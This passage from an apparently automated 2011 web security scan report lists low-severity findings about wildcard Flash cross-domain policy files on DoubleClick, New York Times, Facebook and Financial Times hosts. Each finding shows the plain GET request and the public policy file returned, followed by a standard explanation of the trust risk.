<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

5.21. http://pubads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Thu, 12 May 2011 03:46:12 GMT
Expires: Fri, 13 May 2011 03:46:12 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 26114
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

5.22. http://timespeople.nytimes.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://timespeople.nytimes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: timespeople.nytimes.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 11:03:16 GMT
Content-length: 464
Content-type: text/xml
Last-modified: Wed, 10 Mar 2010 02:18:30 GMT
Accept-ranges: bytes
Connection: keep-alive

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.*.nytimes.com" />
   <allow-access-from domain="*.nytimes.com" />
   <allow-access-from domain="*.nytvideo.feedroom.com" />
   <allow-access-from domain="*.www.feedroom.com" />
   <allow-access-from domain="*.chumby.com" />
   <allow-access-from domain="*.*.tremormedia.com" />
   <allow-access-from domain="*.tremormedia.com" />
   <allow-access-from domain="*.brightcove.com" />
...[SNIP]...

5.23. http://www.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.54.204.51
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

5.24. http://www.ft.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ft.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interacti